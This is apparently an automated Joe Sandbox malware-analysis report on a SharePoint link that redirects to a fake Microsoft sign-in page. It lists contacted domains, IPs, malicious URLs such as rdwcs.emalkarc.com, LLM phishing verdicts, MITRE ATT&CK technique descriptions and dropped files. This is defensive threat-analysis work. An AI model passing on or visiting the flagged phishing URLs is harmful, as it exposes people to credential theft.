cdn.socket.io	unknown	unknown	false	unknown
m365cdn.nel.measure.office.net	unknown	unknown	false	unknown
spo.nel.measure.office.net	unknown	unknown	false	unknown
eastus1-mediap.svc.ms	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Reputation
https://formgrind-my.sharepoint.com/personal/laurence_formgrind_com/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Flaurence%5Fformgrind%5Fcom%2FDocuments%2FNotebooks%2FEmployee%20%20Handbook%20Self%2DService%2Ejpg&parent=%2Fpersonal%2Flaurence%5Fformgrind%5Fcom%2FDocuments%2FNotebooks&ga=1	false	unknown
https://rdwcs.emalkarc.com/KsmxUZnO/	true	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7r0ya/0x4AAAAAAAcRsPy5c0bzqNqJ/auto/normal	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.69.116.104	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.26.8.44	ipapi.co	United States	13335	CLOUDFLARENETUS	false
13.107.136.10	dual-spo-0005.spo-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.168.117.171	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
216.58.212.164	unknown	United States	15169	GOOGLEUS	false
2.23.209.10	unknown	European Union	1273	CWVodafoneGroupPLCEU	false
104.17.3.184	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
172.67.169.107	unknown	United States	13335	CLOUDFLARENETUS	false
18.245.187.88	unknown	United States	16509	AMAZON-02US	false
142.250.181.238	unknown	United States	15169	GOOGLEUS	false
23.15.178.10	unknown	United States	20940	AKAMAI-ASN1EU	false
104.102.58.241	unknown	United States	16625	AKAMAI-ASUS	false
13.227.219.40	d2vgu95hoyrpkh.cloudfront.net	United States	16509	AMAZON-02US	false
44.212.150.222	httpbin.org	United States	14618	AMAZON-AESUS	false
142.250.186.132	www.google.com	United States	15169	GOOGLEUS	false
142.250.186.110	unknown	United States	15169	GOOGLEUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
151.101.194.137	unknown	United States	54113	FASTLYUS	false
185.199.110.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false
172.67.69.226	unknown	United States	13335	CLOUDFLARENETUS	false
172.217.16.202	unknown	United States	15169	GOOGLEUS	false
2.23.209.22	unknown	European Union	1273	CWVodafoneGroupPLCEU	false
34.104.35.123	unknown	United States	15169	GOOGLEUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
74.125.133.84	unknown	United States	15169	GOOGLEUS	false
2.23.209.43	unknown	European Union	1273	CWVodafoneGroupPLCEU	false
216.58.206.67	unknown	United States	15169	GOOGLEUS	false
172.217.18.3	unknown	United States	15169	GOOGLEUS	false
140.82.121.3	github.com	United States	36459	GITHUBUS	false
140.82.121.4	unknown	United States	36459	GITHUBUS	false
3.233.52.245	unknown	United States	14618	AMAZON-AESUS	false
151.101.2.137	code.jquery.com	United States	54113	FASTLYUS	false
104.21.79.87	8105.vrt7119.ru	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
188.114.97.3	bvtjo.logentr.com	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	false
2.16.164.19	unknown	European Union	20940	AKAMAI-ASN1EU	false
104.17.2.184	unknown	United States	13335	CLOUDFLARENETUS	false
104.17.25.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
95.101.54.226	unknown	European Union	34164	AKAMAI-LONGB	false

Private

IP
192.168.2.17

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1465635
Start date and time:	2024-07-01 22:07:32 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://formgrind-my.sharepoint.com/:i:/p/laurence/EQidvWga5z5AkLSZaC8mcgQB5SsWp0hmDAXJ2zBQZCdtYg?e=Awsuih
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.phis.win@28/342@66/321

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 216.58.206.67, 142.250.181.238, 74.125.133.84, 34.104.35.123, 104.102.58.241, 2.23.209.22, 2.23.209.38, 2.23.209.33, 2.23.209.43, 2.23.209.27, 2.23.209.36, 2.23.209.37, 2.23.209.14, 2.23.209.34
Excluded domains from analysis (whitelisted): accounts.google.com, 193488-ipv4v6w.farm.dprodmgd105.sharepointonline.com.akadns.net, e40491.dscd.akamaiedge.net, clientservices.googleapis.com, res-1.cdn.office.net, e19254.dscg.akamaiedge.net, shell.cdn.office.net-c.edgekey.net.globalredir.akadns.net, shell.cdn.office.net-c.edgekey.net, clients2.google.com, edgedl.me.gvt1.com, shell.cdn.office.net, clients.l.google.com, res-1.cdn.office.net-c.edgekey.net, res-1.cdn.office.net-c.edgekey.net.globalredir.akadns.net
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://formgrind-my.sharepoint.com/:i:/p/laurence/EQidvWga5z5AkLSZaC8mcgQB5SsWp0hmDAXJ2zBQZCdtYg?e=Awsuih

LLM Input / Output

Input	Output
URL: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB Model: Perplexity: mixtral-8x7b-instruct	{"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a 'Sign in' button which is a part of the login form.","The text does not create a sense of urgency.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
Title: Revenue Recognition OCR: .1 Microsoft Sign in Email, phone, or Skype No account? Create one! Can't access your account? Next Sign-in options Terms of use Privacy & cookies
URL: https://rdwcs.emalkarc.com Model: gpt-4o	```json{ "phishing_score": 9, "brands": "Microsoft", "phishing": true, "suspicious_domain": true, "has_prominent_loginform": true, "has_captcha": false, "setechniques": true, "has_suspicious_link": false, "legitmate_domain": "microsoft.com", "reasons": "The URL 'https://rdwcs.emalkarc.com' does not match the legitimate domain for Microsoft, which is 'microsoft.com'. The page prominently displays a login form, which is a common tactic used in phishing attacks to harvest user credentials. The domain name 'emalkarc.com' is suspicious and not associated with Microsoft. The use of a subdomain 'rdwcs' further adds to the suspicion. There are no captchas present, which is typical for phishing sites to make the login process appear seamless. The overall design of the page mimics Microsoft's login page, which is a social engineering technique to mislead users."}

URL: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB# Model: Perplexity: mixtral-8x7b-instruct	{"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","The text does not create a sense of urgency.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
Title: Revenue Recognition OCR: Microsoft Sign in We couldn't find an account with that username. Try another, or get a new Microsoft account asdasdasd@schssff.com No account? Create one! Can't access your account? Next Sign-in options Terms of use Privacy & cookies
URL: https://rdwcs.emalkarc.com Model: gpt-4o	```json{ "phishing_score": 9, "brands": "Microsoft", "phishing": true, "suspicious_domain": true, "has_prominent_loginform": true, "has_captcha": false, "setechniques": true, "has_suspicious_link": true, "legitmate_domain": "microsoft.com", "reasons": "The URL 'https://rdwcs.emalkarc.com' does not match the legitimate domain for Microsoft, which is 'microsoft.com'. The page displays a prominent login form, which is a common tactic used in phishing attacks. Additionally, the domain name 'emalkarc.com' is suspicious and not associated with Microsoft. The presence of a suspicious link ('get a new Microsoft account') that could potentially lead to a phishing page further raises concerns. The combination of these factors strongly indicates that this site is a phishing site."}

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 1 19:08:07 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9907154312807664
Encrypted:	false
SSDEEP:
MD5:	0D8B9E4FF1C5A6B51B3A9B73D1A66394
SHA1:	97571580D9EE0E0C249167C6C4A9F841590FBCCB
SHA-256:	500F647B9676694E60594B40373D813E6D15DC107BA31940999826262B8BF653
SHA-512:	BE06C9D35A0E5A472FD16E3ABCFEBCB174CE359DA793813AA6A9BF0196CE7D32CD9DDED8DAEB174076E00A7A4C188179ED17FC39F1592F905F294DF55BC835EB
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....h.c........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............w.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://formgrind-my.sharepoint.com/:i:/p/laurence/EQidvWga5z5AkLSZaC8mcgQB5SsWp0hmDAXJ2zBQZCdtYg?e=Awsuih

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

LLM Input / Output

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 314

Chrome Cache Entry: 315

Chrome Cache Entry: 316

Chrome Cache Entry: 317

Chrome Cache Entry: 318

Chrome Cache Entry: 319

Chrome Cache Entry: 321

Chrome Cache Entry: 322

Chrome Cache Entry: 323

Chrome Cache Entry: 324

Chrome Cache Entry: 325

Chrome Cache Entry: 328

Chrome Cache Entry: 330

Chrome Cache Entry: 331

Chrome Cache Entry: 332

Chrome Cache Entry: 333

Chrome Cache Entry: 334

Chrome Cache Entry: 335

Chrome Cache Entry: 336

Chrome Cache Entry: 337

Chrome Cache Entry: 338

Chrome Cache Entry: 339

Chrome Cache Entry: 340

Chrome Cache Entry: 341

Chrome Cache Entry: 342

Chrome Cache Entry: 343

Chrome Cache Entry: 345

Chrome Cache Entry: 346

Chrome Cache Entry: 347

Chrome Cache Entry: 348

Chrome Cache Entry: 349

Windows Analysis Report
https://formgrind-my.sharepoint.com/:i:/p/laurence/EQidvWga5z5AkLSZaC8mcgQB5SsWp0hmDAXJ2zBQZCdtYg?e=Awsuih